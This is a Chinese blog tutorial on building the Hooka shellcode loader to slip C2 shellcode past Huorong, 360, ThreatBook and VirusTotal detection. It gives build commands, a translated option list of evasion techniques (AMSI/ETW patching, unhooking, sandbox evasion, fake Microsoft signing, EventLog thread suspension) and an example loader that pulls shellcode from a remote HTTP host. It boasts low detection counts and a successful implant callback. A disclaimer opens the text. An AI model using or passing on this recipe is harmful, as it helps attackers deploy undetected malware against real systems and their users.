利用Hooka开源的多种功能shellcode加载器实现快速免杀火绒,静态360+360杀毒,微步查杀1,vt查杀7(教程)

免责声明:

本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在使用本文信息时,必须严格遵循适用的法律法规及服务协议,自行承担一切风险与责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。

项目介绍:

Hooka 能够生成具有多种功能的 shellcode 加载器。它还基于 BokuLoaderFreezeShhhloader 等其他工具,并尝试实现更多规避功能。

先安装Golang

wget https://go.dev/dl/go1.21.1.linux-amd64.tar.gz

然后执行解压安装

sudo tar -C /usr/local -xzf go1.21.1.linux-amd64.tar.gz

配置环境变量

echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc

source ~/.bashrc

验证是否安装成功

go version

下载好项目后打开

git clone https://github.com/D3Ext/Hooka

cd Hooka

执行make

发现出现的错误是因为 Go 在构建时尝试从 https://proxy.golang.org 下载依赖包,但由于网络问题(例如代理配置或无法访问外网),导致无法连接到 Go 模块代理服务。

配置 Go 使用国内镜像

go env -w GOPROXY=https://goproxy.cn,direct

go env | grep GOPROXY

执行完毕可以看见多了一个build的文件夹然后cd build

给与权限

chmod 777 hooka_linux_amd64

先用之前vshell的生成amd64位shellcode 放到同一文件夹下执行命令生成简单的 EXE 加载程序

./hooka_linux_amd64 -i shellcode.bin -o loader.exe

成功生成

使用参数我简单翻译了一点


| | | | ___ ___ | | __ __ _ | |

| |_| | / _ \ / _ \ | |/ / / _` | | |

| _ | | () | | () | | < | (| | ||

|| || \/ \/ ||\\ \__,| ()

Hooka 用法:

必需:

-i,--输入要注入的字符串有效负载原始格式,作为 PE、作为 DLL 或来自 URL

-o,--输出字符串输出文件的名称(即 loader.exe)

-f,--格式字符串要生成的有效负载的格式(可用:exe、dll)(默认 exe)

执行:

--proc 字符串 在需要给定执行技术时生成的进程(处于挂起状态)(默认 notepad.exe)

--exec 字符串 用于加载 shellcode 的技术(默认"SuspendedProcess"):

SuspendedProcess

ProcessHollowing

NtCreateThreadEx

EtwpCreateEtwThread

NtQueueApcThreadEx No-RWX

辅助:

-a,--arch 字符串要生成的加载程序的体系结构(默认为 amd64)

-c, --cert 字符串证书,用于对生成的加载程序进行签名(即 cert.pfx)

-d, --domain 字符串域,用于对加载程序进行签名(即www.microsoft.com)

编码:

--enc 字符串使用给定算法加密 shellcode(可用算法:aes、3des、rc4、xor)(默认无)

--sgn 使用 Shikata Ga Nai 对生成的加载程序进行编码(必须安装在路径上)

--strings 使用凯撒密码对字符串进行模糊处理

规避:

--unhook 要使用的字符串解钩技术(可用:完整版、peruns)

--sandbox 启用沙盒规避

--no-amsi 不修补 AMSI

--no-etw 不修补 ETW

--hashing 使用哈希检索函数指针

--acg 启用 ACG Guard 以防止 AV/EDR 修改现有的可执行代码

--blockdlls 防止非 Microsoft 签名的 DLL 注入子进程

--phantom 使用 Phant0m 技术暂停 EventLog 线程。需要高权限,否则加载程序会跳过此步骤

--sleep 使用自定义睡眠功能延迟 shellcode 执行

额外:

--calc 使用 calc.exe shellcode 测试加载程序功能(不提供输入文件)

--compress 使用压缩生成的加载程序Golang 编译器和 UPX(如果已安装)

-r, --rand 使用一组随机参数创建随机加载器(仅用于测试目的)

-v, --verbose 启用详细打印额外信息

-h, --help 打印帮助面板

示例:

hooka -i shellcode.bin -o loader.exe

hooka -i http://192.168.1.126/shellcode.bin -o loader.exe

hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --完全解除挂钩 --sleep 60 --acg

hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose

以下是vt+火绒+360+杀毒+微步的查杀效果

成功上线

项目地址:https://github.com/D3Ext/Hooka

相关推荐
Zacks_xdc35 分钟前
【前端】使用Vercel部署前端项目,api转发到后端服务器
运维·服务器·前端·安全·react.js
盟接之桥3 小时前
盟接之桥说制造:在安全、确定与及时之间,构建品质、交期与反应速度的动态平衡
大数据·运维·安全·汽车·制造·devops
Suckerbin3 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
喜葵4 小时前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
泰迪智能科技5 小时前
案例分享|企微智能会话风控系统:为尚丰盈铝业筑牢沟通安全防线
安全·企业微信
lingggggaaaa6 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
MoloXuanhe7 小时前
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
运维·网络·安全·tryhackme·thm
wanhengidc7 小时前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机
czijin10 小时前
【论文阅读】Security of Language Models for Code: A Systematic Literature Review
论文阅读·人工智能·安全·语言模型·软件工程
2501_9159214310 小时前
iOS混淆工具实战 在线教育直播类 App 的课程与互动安全防护
android·安全·ios·小程序·uni-app·iphone·webview